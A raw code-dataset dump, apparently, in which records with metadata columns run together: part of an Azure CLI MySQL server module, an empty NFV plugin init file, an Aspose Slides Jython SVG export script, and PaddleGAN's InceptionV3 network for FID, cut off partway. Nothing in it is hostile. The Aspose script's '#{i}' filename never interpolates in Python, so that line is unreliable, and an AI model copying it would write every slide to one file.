iops = max_supported_iops
logger.warning('The max IOPS for your sku is %s. Provisioning the server with %s IOPS...', iops, iops)
elif default_iops <= iops <= free_storage_iops:
iops = min(free_storage_iops, max_supported_iops)
logger.warning('Your IOPS input is below the free IOPS provided. Provisioning the server with %s free IOPS...', iops)
return iops
# pylint: disable=too-many-instance-attributes, too-few-public-methods, useless-object-inheritance
class DbContext(object):
def __init__(self, azure_sdk=None, logging_name=None, cf_firewall=None, cf_db=None,
command_group=None, server_client=None):
self.azure_sdk = azure_sdk
self.cf_firewall = cf_firewall
self.cf_db = cf_db
self.logging_name = logging_name
self.command_group = command_group
self.server_client = server_client
|
en
| 0.616691
|
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- # pylint: disable=unused-argument, line-too-long # pylint: disable=import-error # region create without args # pylint: disable=too-many-locals, too-many-statements # validator # Raise error when user passes values for both parameters # When address space parameters are passed, the only valid combination is : --vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix # pylint: disable=too-many-boolean-expressions # Populate desired parameters # Handle Vnet scenario # calculate IOPS # storage input comes in GiB value # Create mysql server # Note : passing public_access has no effect as the accepted values are 'Enabled' and 'Disabled'. So the value ends up being ignored. # Adding firewall rule # Create mysql database if it does not exist # Retrieve location from same location as source server # pylint: disable=too-many-branches # validator # replacement not needed for update in flex servers # Downgrading SKU # Upgrading SKU # pylint: disable=too-many-boolean-expressions # Downgrading # Upgrading # if disabled is pass in reset to default values # set values - if maintenance_window when is None when created then create a new object # default return value # pylint: disable=protected-access # pylint: disable=broad-except # Parameter update command # update the command with system default # reset value to default # Replica commands # Custom functions for server replica, will add PostgreSQL part after backend ready in future # set source server id # replacement not needed for update in flex servers # Note : passing public-network-access has no effect as the accepted values are 'Enabled' and 'Disabled'. # So when you pass an IP here(from the CLI args of public_access), it ends up being ignored. # Setting the server name in the local context # Setting the location in the local context # Setting the server name in the local context # check for existing database, create if not # pylint: disable=too-many-instance-attributes, too-few-public-methods, useless-object-inheritance
| 1.682834
| 2
|
nfv/nfv-plugins/nfv_plugins/nfvi_plugins/clients/__init__.py
|
SidneyAn/nfv
| 2
|
6628124
|
<filename>nfv/nfv-plugins/nfv_plugins/nfvi_plugins/clients/__init__.py
#
# Copyright (c) 2018 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
|
<filename>nfv/nfv-plugins/nfv_plugins/nfvi_plugins/clients/__init__.py
#
# Copyright (c) 2018 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
|
en
| 0.450774
|
# # Copyright (c) 2018 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 #
| 1.102799
| 1
|
Plugins/Aspose-Slides-Java-for-Jython/asposeslides/WorkingWithSlidesInPresentation/CreatingSvg.py
|
Aspose/Aspose.Slides-for-Java
| 1
|
6628125
|
from asposeslides import Settings
from com.aspose.slides import Presentation
from com.aspose.slides import SaveFormat
from java.io import FileOutputStream
class CreatingSvg:
def __init__(self):
dataDir = Settings.dataDir + 'WorkingWithSlidesInPresentation/CreatingSvg/'
## Instantiate Presentation class that represents the presentation file
pres = Presentation(dataDir + 'demo.pptx')
# Getting last slide index
last_slide_position = pres.getSlides().size()
#Iterating through every presentation slide and generating SVG image
i = 0
while i < last_slide_position:
# Accessing Slides
slide = pres.getSlides().get_Item(i)
# Getting and saving the slide SVG image
slide.writeAsSvg(FileOutputStream(dataDir + "SvgImage#{i}.svg"))
i+=1
print "Created SVG images, please check output files."
if __name__ == '__main__':
CreatingSvg()
|
from asposeslides import Settings
from com.aspose.slides import Presentation
from com.aspose.slides import SaveFormat
from java.io import FileOutputStream
class CreatingSvg:
def __init__(self):
dataDir = Settings.dataDir + 'WorkingWithSlidesInPresentation/CreatingSvg/'
## Instantiate Presentation class that represents the presentation file
pres = Presentation(dataDir + 'demo.pptx')
# Getting last slide index
last_slide_position = pres.getSlides().size()
#Iterating through every presentation slide and generating SVG image
i = 0
while i < last_slide_position:
# Accessing Slides
slide = pres.getSlides().get_Item(i)
# Getting and saving the slide SVG image
slide.writeAsSvg(FileOutputStream(dataDir + "SvgImage#{i}.svg"))
i+=1
print "Created SVG images, please check output files."
if __name__ == '__main__':
CreatingSvg()
|
en
| 0.777831
|
## Instantiate Presentation class that represents the presentation file # Getting last slide index #Iterating through every presentation slide and generating SVG image # Accessing Slides # Getting and saving the slide SVG image #{i}.svg"))
| 3.078543
| 3
|
ppgan/metrics/inception.py
|
lyl120117/PaddleGAN
| 6,852
|
6628126
|
#Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import math
import paddle
import paddle.nn as nn
from paddle.nn import Conv2D, AvgPool2D, MaxPool2D, BatchNorm, Linear, AdaptiveAvgPool2D
__all__ = ['InceptionV3']
class InceptionV3(nn.Layer):
DEFAULT_BLOCK_INDEX = 3
BLOCK_INDEX_BY_DIM = {
64: 0, # First max pooling features
192: 1, # Second max pooling featurs
768: 2, # Pre-aux classifier features
2048: 3 # Final average pooling features
}
def __init__(self,
output_blocks=[DEFAULT_BLOCK_INDEX],
class_dim=1000,
aux_logits=False,
resize_input=True,
normalize_input=True):
super(InceptionV3, self).__init__()
self.resize_input = resize_input
self.normalize_input = normalize_input
self.output_blocks = sorted(output_blocks)
self.last_needed_block = max(output_blocks)
self.class_dim = class_dim
self.aux_logits = aux_logits
assert self.last_needed_block <= 3, 'Last possible output block index is 3'
self.blocks = []
self.Conv2d_1a_3x3 = ConvBNLayer(3,
32,
3,
stride=2,
name='Conv2d_1a_3x3')
self.Conv2d_2a_3x3 = ConvBNLayer(32, 32, 3, name='Conv2d_2a_3x3')
self.Conv2d_2b_3x3 = ConvBNLayer(32,
64,
3,
padding=1,
name='Conv2d_2b_3x3')
self.maxpool1 = MaxPool2D(kernel_size=3, stride=2)
block0 = [
self.Conv2d_1a_3x3, self.Conv2d_2a_3x3, self.Conv2d_2b_3x3,
self.maxpool1
]
self.blocks.append(nn.Sequential(*block0))
### block1
if self.last_needed_block >= 1:
self.Conv2d_3b_1x1 = ConvBNLayer(64, 80, 1, name='Conv2d_3b_1x1')
self.Conv2d_4a_3x3 = ConvBNLayer(80, 192, 3, name='Conv2d_4a_3x3')
self.maxpool2 = MaxPool2D(kernel_size=3, stride=2)
block1 = [self.Conv2d_3b_1x1, self.Conv2d_4a_3x3, self.maxpool2]
self.blocks.append(nn.Sequential(*block1))
### block2
### Mixed_5b 5c 5d
if self.last_needed_block >= 2:
self.Mixed_5b = Fid_inceptionA(192,
pool_features=32,
name='Mixed_5b')
self.Mixed_5c = Fid_inceptionA(256,
pool_features=64,
name='Mixed_5c')
self.Mixed_5d = Fid_inceptionA(288,
pool_features=64,
name='Mixed_5d')
### Mixed_6
self.Mixed_6a = InceptionB(288, name='Mixed_6a')
self.Mixed_6b = Fid_inceptionC(768, c7=128, name='Mixed_6b')
self.Mixed_6c = Fid_inceptionC(768, c7=160, name='Mixed_6c')
self.Mixed_6d = Fid_inceptionC(768, c7=160, name='Mixed_6d')
self.Mixed_6e = Fid_inceptionC(768, c7=192, name='Mixed_6e')
block2 = [
self.Mixed_5b, self.Mixed_5c, self.Mixed_5d, self.Mixed_6a,
self.Mixed_6b, self.Mixed_6c, self.Mixed_6d, self.Mixed_6e
]
self.blocks.append(nn.Sequential(*block2))
if self.aux_logits:
self.AuxLogits = InceptionAux(768, self.class_dim, name='AuxLogits')
### block3
### Mixed_7
if self.last_needed_block >= 3:
self.Mixed_7a = InceptionD(768, name='Mixed_7a')
self.Mixed_7b = Fid_inceptionE_1(1280, name='Mixed_7b')
self.Mixed_7c = Fid_inceptionE_2(2048, name='Mixed_7c')
self.avgpool = AdaptiveAvgPool2D(output_size=1)
block3 = [self.Mixed_7a, self.Mixed_7b, self.Mixed_7c, self.avgpool]
self.blocks.append(nn.Sequential(*block3))
def forward(self, x):
out = []
aux = None
if self.resize_input:
x = nn.functional.interpolate(x,
size=[299, 299],
mode='bilinear',
align_corners=False,
align_mode=0)
if self.normalize_input:
x = x * 2 - 1
for idx, block in enumerate(self.blocks):
x = block(x)
if self.aux_logits and (idx == 2):
aux = self.AuxLogits(x)
if idx in self.output_blocks:
out.append(x)
if idx == self.last_needed_block:
break
return out, aux
class InceptionA(nn.Layer):
def __init__(self, in_channels, pool_features, name=None):
super(InceptionA, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch1x1')
self.branch5x5_1 = ConvBNLayer(in_channels,
48,
1,
name=name + '.branch5x5_1')
self.branch5x5_2 = ConvBNLayer(48,
64,
5,
padding=2,
name=name + '.branch5x5_2')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(64,
96,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3 = ConvBNLayer(96,
96,
3,
padding=1,
name=name + '.branch3x3dbl_3')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
pool_features,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch5x5, branch3x3dbl, branch_pool], axis=1)
class InceptionB(nn.Layer):
def __init__(self, in_channels, name=None):
super(InceptionB, self).__init__()
self.branch3x3 = ConvBNLayer(in_channels,
384,
3,
stride=2,
name=name + '.branch3x3')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(64,
96,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3 = ConvBNLayer(96,
96,
3,
stride=2,
name=name + '.branch3x3dbl_3')
self.branch_pool = MaxPool2D(kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3(x)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = self.branch_pool(x)
return paddle.concat([branch3x3, branch3x3dbl, branch_pool],
axis=1)
class InceptionC(nn.Layer):
def __init__(self, in_channels, c7, name=None):
super(InceptionC, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch1x1')
self.branch7x7_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7_1')
self.branch7x7_2 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7_2')
self.branch7x7_3 = ConvBNLayer(c7,
192, (7, 1),
padding=(3, 0),
name=name + '.branch7x7_3')
self.branch7x7dbl_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7dbl_1')
self.branch7x7dbl_2 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_2')
self.branch7x7dbl_3 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_3')
self.branch7x7dbl_4 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_4')
self.branch7x7dbl_5 = ConvBNLayer(c7,
192, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_5')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch7x7, branch7x7dbl, branch_pool], axis=1)
class InceptionD(nn.Layer):
def __init__(self, in_channels, name=None):
super(InceptionD, self).__init__()
self.branch3x3_1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch3x3_1')
self.branch3x3_2 = ConvBNLayer(192,
320,
3,
stride=2,
name=name + '.branch3x3_2')
self.branch7x7x3_1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch7x7x3_1')
self.branch7x7x3_2 = ConvBNLayer(192,
192, (1, 7),
padding=(0, 3),
name=name + '.branch7x7x3_2')
self.branch7x7x3_3 = ConvBNLayer(192,
192, (7, 1),
padding=(3, 0),
name=name + '.branch7x7x3_3')
self.branch7x7x3_4 = ConvBNLayer(192,
192,
3,
stride=2,
name=name + '.branch7x7x3_4')
self.branch_pool = MaxPool2D(kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3_1(x)
branch3x3 = self.branch3x3_2(branch3x3)
branch7x7x3 = self.branch7x7x3_1(x)
branch7x7x3 = self.branch7x7x3_2(branch7x7x3)
branch7x7x3 = self.branch7x7x3_3(branch7x7x3)
branch7x7x3 = self.branch7x7x3_4(branch7x7x3)
branch_pool = self.branch_pool(x)
return paddle.concat([branch3x3, branch7x7x3, branch_pool],
axis=1)
class InceptionE(nn.Layer):
def __init__(self, in_channels, name=None):
super(InceptionE, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
320,
1,
name=name + '.branch1x1')
self.branch3x3_1 = ConvBNLayer(in_channels,
384,
1,
name=name + '.branch3x3_1')
self.branch3x3_2a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3_2a')
self.branch3x3_2b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3_2b')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
448,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(448,
384,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3dbl_3a')
self.branch3x3dbl_3b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3dbl_3b')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3_1 = self.branch3x3_1(x)
branch3x3_2a = self.branch3x3_2a(branch3x3_1)
branch3x3_2b = self.branch3x3_2b(branch3x3_1)
branch3x3 = paddle.concat([branch3x3_2a, branch3x3_2b], axis=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl_3a = self.branch3x3dbl_3a(branch3x3dbl)
branch3x3dbl_3b = self.branch3x3dbl_3b(branch3x3dbl)
branch3x3dbl = paddle.concat([branch3x3dbl_3a, branch3x3dbl_3b],
axis=1)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1)
class InceptionAux(nn.Layer):
def __init__(self, in_channels, num_classes, name=None):
super(InceptionAux, self).__init__()
self.num_classes = num_classes
self.pool0 = AvgPool2D(kernel_size=5, stride=3)
self.conv0 = ConvBNLayer(in_channels, 128, 1, name=name + '.conv0')
self.conv1 = ConvBNLayer(128, 768, 5, name=name + '.conv1')
self.pool1 = AvgPool2D(global_pooling=True)
def forward(self, x):
x = self.pool0(x)
x = self.conv0(x)
x = self.conv1(x)
x = self.pool1(x)
x = paddle.flatten(x, axis=1)
x = paddle.static.nn.fc(x, size=self.num_classes)
return x
class Fid_inceptionA(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, pool_features, name=None):
super(Fid_inceptionA, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch1x1')
self.branch5x5_1 = ConvBNLayer(in_channels,
48,
1,
name=name + '.branch5x5_1')
self.branch5x5_2 = ConvBNLayer(48,
64,
5,
padding=2,
name=name + '.branch5x5_2')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(64,
96,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3 = ConvBNLayer(96,
96,
3,
padding=1,
name=name + '.branch3x3dbl_3')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
pool_features,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch5x5, branch3x3dbl, branch_pool], axis=1)
class Fid_inceptionC(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, c7, name=None):
super(Fid_inceptionC, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch1x1')
self.branch7x7_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7_1')
self.branch7x7_2 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7_2')
self.branch7x7_3 = ConvBNLayer(c7,
192, (7, 1),
padding=(3, 0),
name=name + '.branch7x7_3')
self.branch7x7dbl_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7dbl_1')
self.branch7x7dbl_2 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_2')
self.branch7x7dbl_3 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_3')
self.branch7x7dbl_4 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_4')
self.branch7x7dbl_5 = ConvBNLayer(c7,
192, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_5')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch7x7, branch7x7dbl, branch_pool], axis=1)
class Fid_inceptionE_1(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, name=None):
super(Fid_inceptionE_1, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
320,
1,
name=name + '.branch1x1')
self.branch3x3_1 = ConvBNLayer(in_channels,
384,
1,
name=name + '.branch3x3_1')
self.branch3x3_2a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3_2a')
self.branch3x3_2b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3_2b')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
448,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(448,
384,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3dbl_3a')
self.branch3x3dbl_3b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3dbl_3b')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3_1 = self.branch3x3_1(x)
branch3x3_2a = self.branch3x3_2a(branch3x3_1)
branch3x3_2b = self.branch3x3_2b(branch3x3_1)
branch3x3 = paddle.concat([branch3x3_2a, branch3x3_2b], axis=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl_3a = self.branch3x3dbl_3a(branch3x3dbl)
branch3x3dbl_3b = self.branch3x3dbl_3b(branch3x3dbl)
branch3x3dbl = paddle.concat([branch3x3dbl_3a, branch3x3dbl_3b],
axis=1)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1)
class Fid_inceptionE_2(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, name=None):
super(Fid_inceptionE_2, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
320,
1,
name=name + '.branch1x1')
self.branch3x3_1 = ConvBNLayer(in_channels,
384,
1,
name=name + '.branch3x3_1')
self.branch3x3_2a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3_2a')
self.branch3x3_2b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3_2b')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
448,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(448,
384,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3dbl_3a')
self.branch3x3dbl_3b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3dbl_3b')
### same with paper
self.branch_pool0 = MaxPool2D(kernel_size=3,
stride=1,
padding=1)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3_1 = self.branch3x3_1(x)
branch3x3_2a = self.branch3x3_2a(branch3x3_1)
branch3x3_2b = self.branch3x3_2b(branch3x3_1)
branch3x3 = paddle.concat([branch3x3_2a, branch3x3_2b], axis=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl_3a = self.branch3x3dbl_3a(branch3x3dbl)
branch3x3dbl_3b = self.branch3x3dbl_3b(branch3x3dbl)
branch3x3dbl = paddle.concat([branch3x3dbl_3a, branch3x3dbl_3b],
axis=1)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1)
class ConvBNLayer(nn.Layer):
def __init__(self,
in_channels,
num_filters,
filter_size,
stride=1,
padding=0,
groups=1,
act='relu',
name=None):
super(ConvBNLayer, self).__init__()
self.conv = Conv2D(in_channels=in_channels,
out_channels=num_filters,
kernel_size=filter_size,
stride=stride,
padding=padding,
groups=groups,
weight_attr=paddle.ParamAttr(name=name + ".conv.weight"),
bias_attr=False)
self.bn = BatchNorm(num_filters,
act=act,
epsilon=0.001,
param_attr=paddle.ParamAttr(name=name + ".bn.weight"),
bias_attr=paddle.ParamAttr(name=name + ".bn.bias"),
moving_mean_name=name + '.bn.running_mean',
moving_variance_name=name + '.bn.running_var')
def forward(self, inputs):
y = self.conv(inputs)
y = self.bn(y)
return y
|
#Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import math
import paddle
import paddle.nn as nn
from paddle.nn import Conv2D, AvgPool2D, MaxPool2D, BatchNorm, Linear, AdaptiveAvgPool2D
__all__ = ['InceptionV3']
class InceptionV3(nn.Layer):
DEFAULT_BLOCK_INDEX = 3
BLOCK_INDEX_BY_DIM = {
64: 0, # First max pooling features
192: 1, # Second max pooling featurs
768: 2, # Pre-aux classifier features
2048: 3 # Final average pooling features
}
def __init__(self,
output_blocks=[DEFAULT_BLOCK_INDEX],
class_dim=1000,
aux_logits=False,
resize_input=True,
normalize_input=True):
super(InceptionV3, self).__init__()
self.resize_input = resize_input
self.normalize_input = normalize_input
self.output_blocks = sorted(output_blocks)
self.last_needed_block = max(output_blocks)
self.class_dim = class_dim
self.aux_logits = aux_logits
assert self.last_needed_block <= 3, 'Last possible output block index is 3'
self.blocks = []
self.Conv2d_1a_3x3 = ConvBNLayer(3,
32,
3,
stride=2,
name='Conv2d_1a_3x3')
self.Conv2d_2a_3x3 = ConvBNLayer(32, 32, 3, name='Conv2d_2a_3x3')
self.Conv2d_2b_3x3 = ConvBNLayer(32,
64,
3,
padding=1,
name='Conv2d_2b_3x3')
self.maxpool1 = MaxPool2D(kernel_size=3, stride=2)
block0 = [
self.Conv2d_1a_3x3, self.Conv2d_2a_3x3, self.Conv2d_2b_3x3,
self.maxpool1
]
self.blocks.append(nn.Sequential(*block0))
### block1
if self.last_needed_block >= 1:
self.Conv2d_3b_1x1 = ConvBNLayer(64, 80, 1, name='Conv2d_3b_1x1')
self.Conv2d_4a_3x3 = ConvBNLayer(80, 192, 3, name='Conv2d_4a_3x3')
self.maxpool2 = MaxPool2D(kernel_size=3, stride=2)
block1 = [self.Conv2d_3b_1x1, self.Conv2d_4a_3x3, self.maxpool2]
self.blocks.append(nn.Sequential(*block1))
### block2
### Mixed_5b 5c 5d
if self.last_needed_block >= 2:
self.Mixed_5b = Fid_inceptionA(192,
pool_features=32,
name='Mixed_5b')
self.Mixed_5c = Fid_inceptionA(256,
pool_features=64,
name='Mixed_5c')
self.Mixed_5d = Fid_inceptionA(288,
pool_features=64,
name='Mixed_5d')
### Mixed_6
self.Mixed_6a = InceptionB(288, name='Mixed_6a')
self.Mixed_6b = Fid_inceptionC(768, c7=128, name='Mixed_6b')
self.Mixed_6c = Fid_inceptionC(768, c7=160, name='Mixed_6c')
self.Mixed_6d = Fid_inceptionC(768, c7=160, name='Mixed_6d')
self.Mixed_6e = Fid_inceptionC(768, c7=192, name='Mixed_6e')
block2 = [
self.Mixed_5b, self.Mixed_5c, self.Mixed_5d, self.Mixed_6a,
self.Mixed_6b, self.Mixed_6c, self.Mixed_6d, self.Mixed_6e
]
self.blocks.append(nn.Sequential(*block2))
if self.aux_logits:
self.AuxLogits = InceptionAux(768, self.class_dim, name='AuxLogits')
### block3
### Mixed_7
if self.last_needed_block >= 3:
self.Mixed_7a = InceptionD(768, name='Mixed_7a')
self.Mixed_7b = Fid_inceptionE_1(1280, name='Mixed_7b')
self.Mixed_7c = Fid_inceptionE_2(2048, name='Mixed_7c')
self.avgpool = AdaptiveAvgPool2D(output_size=1)
block3 = [self.Mixed_7a, self.Mixed_7b, self.Mixed_7c, self.avgpool]
self.blocks.append(nn.Sequential(*block3))
def forward(self, x):
out = []
aux = None
if self.resize_input:
x = nn.functional.interpolate(x,
size=[299, 299],
mode='bilinear',
align_corners=False,
align_mode=0)
if self.normalize_input:
x = x * 2 - 1
for idx, block in enumerate(self.blocks):
x = block(x)
if self.aux_logits and (idx == 2):
aux = self.AuxLogits(x)
if idx in self.output_blocks:
out.append(x)
if idx == self.last_needed_block:
break
return out, aux
class InceptionA(nn.Layer):
def __init__(self, in_channels, pool_features, name=None):
super(InceptionA, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch1x1')
self.branch5x5_1 = ConvBNLayer(in_channels,
48,
1,
name=name + '.branch5x5_1')
self.branch5x5_2 = ConvBNLayer(48,
64,
5,
padding=2,
name=name + '.branch5x5_2')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(64,
96,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3 = ConvBNLayer(96,
96,
3,
padding=1,
name=name + '.branch3x3dbl_3')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
